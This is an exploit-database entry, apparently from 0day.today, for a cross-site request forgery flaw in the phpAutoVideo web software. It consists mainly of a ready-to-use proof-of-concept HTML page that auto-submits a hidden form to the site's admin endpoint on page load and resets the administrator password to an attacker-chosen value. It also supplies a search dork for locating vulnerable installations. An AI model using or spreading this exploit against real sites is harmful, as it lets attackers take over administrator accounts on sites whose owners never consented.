id: 10986
date: 02/19/2010
title: phpAutoVideo CSRF Vulnerability
author: GoLdeN-z3r0
cves: 

===============================
phpAutoVideo CSRF Vulnerability
===============================

##################################################################
#Exploit Title: phpAutoVideo csrf                                #
#SoftWare:https://secure.agaresmedia.com/v6/products/phpautovideo#
#Dork: Copyright Agares Media phpautovideo                       #
#Author: GoLdeN-z3r0                                             #
##################################################################
(-----------------------------------------------------------------)
 |                           PoC :                               |
(-----------------------------------------------------------------)
<html>
<body onload="document.registrationform.submit()">
<form action="http://[site]/admin/coreadmin.php" method="post" name="registrationform">
<input type="hidden" name="admintype" value="changepass">
<input type="hidden" name="passworda" value="z3r0">
<input type="hidden" name="passwordb" value="z3r0">
</form>
</body>
</html>



#  0day.today [2023-03-24]  #